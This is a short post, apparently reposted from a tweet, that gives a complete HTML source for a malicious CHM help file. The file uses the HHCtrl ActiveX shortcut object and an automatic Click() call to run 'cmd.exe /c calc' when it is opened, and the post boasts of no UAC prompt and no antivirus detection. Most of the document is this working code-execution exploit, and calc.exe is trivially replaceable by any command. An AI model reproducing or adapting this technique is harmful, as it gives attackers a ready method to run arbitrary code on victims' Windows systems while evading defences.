Run calc.exe via open Chm file, no UAC warning and no av detects!

powertool on Twitter: “Run calc.exe via open Chm file, no UAC warning and no av detects! Sample :”: Run calc.exe via open Chm file, no UAC warning and no av detects!

The exploit is:

  1. <HTML>
  2. <TITLE>Run calc.exe</TITLE>
  3. <HEAD>
  4. </HEAD>
  5. <BODY>
  6. <OBJECT id=x classid=”clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11″ width=1 height=1>
  7. <PARAM name=”Command” value=”ShortCut”>
  8. <PARAM name=”Button” value=”Bitmap::shortcut”>
  9. <PARAM name=”Item1″ value=”,cmd.exe,/c calc ,”>
  10. <PARAM name=”Item2″ value=”273,1,1″>
  11. </OBJECT>
  12. <script>
  13. x.Click();
  14. </SCRIPT>
  15. <A name=contents>
  16. <H2 align=center>Run calc.exe via open Chm file!!!</H2>
  17. <P></A>
  18. <H3 ALIGN=CENTER>@ithurricanept</H3><P>
  19. </BODY>
  20. </HTML>

